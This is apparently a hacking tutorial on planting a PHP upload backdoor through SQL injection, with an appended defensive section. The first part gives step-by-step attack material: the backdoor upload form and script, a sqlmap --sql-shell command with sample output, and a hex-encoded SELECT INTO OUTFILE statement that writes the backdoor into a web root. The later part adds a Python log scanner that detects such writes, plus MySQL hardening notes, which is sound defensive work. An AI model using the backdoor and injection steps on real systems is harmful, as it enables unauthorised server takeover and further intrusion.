Upload Backdoor With Sqlmap


Example target: http://www.target.com/file.php?id=22

Copy this script:



<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." File Ka upload Bro...!!!";}else{echo "Gagal Bro Euy...!";}?>

Convert the string to hex: Visit Here

 
python sqlmap.py -u http://www.target.com/file.php?id=22 --sql-shell

[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";

Wait; if you are lucky, a message will report that the upload succeeded, and if not, try again. If it worked, browse to the file we just wrote: http://www.target.com/upload.php
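Seen from the defending side, the `SELECT 0x... INTO OUTFILE` statement above leaves a recognisable trace in web access logs and in the MySQL general query log. The following is an added example, not part of the original post, that flags it and decodes the hex literal to see whether a script is being written; the log lines, the `PATH/upload.php` path and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# SELECT ... INTO OUTFILE/DUMPFILE '<path>': MySQL's server-side file write
WRITE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(.+?)\2", re.I)
# MySQL hex literal of at least 4 bytes, e.g. 0x3c3f7068...
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})", re.I)
# Byte strings that suggest the written file is a server-side script
SCRIPT_MARKERS = (b"<?php", b"<?=", b"move_uploaded_file")

def inspect(line):
    """Return a finding for a file-writing SELECT in one log line, else None."""
    text = unquote_plus(line)  # access logs carry the parameter URL-encoded
    match = WRITE_RE.search(text)
    if match is None:
        return None
    blobs = [bytes.fromhex(h).lower() for h in HEX_RE.findall(text)]
    is_script = any(marker in blob for blob in blobs for marker in SCRIPT_MARKERS)
    return {"verb": match.group(1).upper(), "path": match.group(3),
            "severity": "high" if is_script else "medium"}

def scan(lines):
    """Return (line_index, finding) for every line that inspect() flags."""
    hits = []
    for index, line in enumerate(lines):
        finding = inspect(line)
        if finding:
            hits.append((index, finding))
    return hits

# Constructed sample data: a harmless stand-in payload and simplified log lines.
PAYLOAD_HEX = b"<?php echo 1; ?>".hex()
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:15:35:06 +0000] "GET /file.php?id=22 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:15:36:10 +0000] "GET /file.php?id=22%20SELECT%200x'
    + PAYLOAD_HEX + '%20INTO%20OUTFILE%20%22PATH/upload.php%22 HTTP/1.1" 200 0',
    "12 Query SELECT name FROM items INTO OUTFILE '/var/lib/mysql-files/export.csv'",
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE):
        print(index, finding)
```

On the server, this statement only succeeds when the MySQL account holds the FILE privilege, `secure_file_priv` permits the target directory, and the database service account can write to the web root; closing any one of these stops the file from being written.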
